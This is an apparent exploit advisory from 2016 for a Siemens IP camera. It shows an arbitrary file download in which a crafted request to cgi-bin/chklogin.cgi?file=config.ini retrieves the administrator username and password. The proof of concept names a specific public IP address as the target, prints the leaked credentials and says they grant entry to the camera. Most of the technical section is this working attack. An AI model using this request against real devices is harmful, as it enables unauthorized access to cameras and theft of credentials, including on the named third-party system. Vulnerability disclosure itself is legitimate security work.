#Exploit Title: Siemens IP Camera :: Arbitrary file download
# Date: [14-september-2016]
# Exploit Author: [vuppala.Dhanunjaya]
# Vendor Homepage: [www.siemens.com]
# Version: [V0.1.69]
# Tested on: [Windows 10,ubuntu 14.04 LTS]
# Email : vuppaladhani@gmail.com

========================================
TEAM 
========================================

Harsha Vardhan (https://www.facebook.com/HarshaHere)
Santosh Kumar  (https://www.facebook.com/M4drob0t)
Akhil Manikanth(https://www.facebook.com/IaMAkIlManIkAnTh)
Manish Yadav   (https://www.facebook.com/spikeymanish)

Thankyou for the support 

========================================
TECHNICAL DETAILS & POC
========================================

Target  : https://78.56.240.235/cgi-bin/chklogin.cgi?rnd=1473849790369

Downloding the config file : cgi-bin/chklogin.cgi?file=config.ini 

https://78.56.240.235/cgi-bin/chklogin.cgi?file=config.ini

this config.ini file contains the username nd password of the administration login

account.admin.user_id=admin
account.admin.password=admin
account.admin.language=english

using this login credentials we can get into the IPcam


Thankyou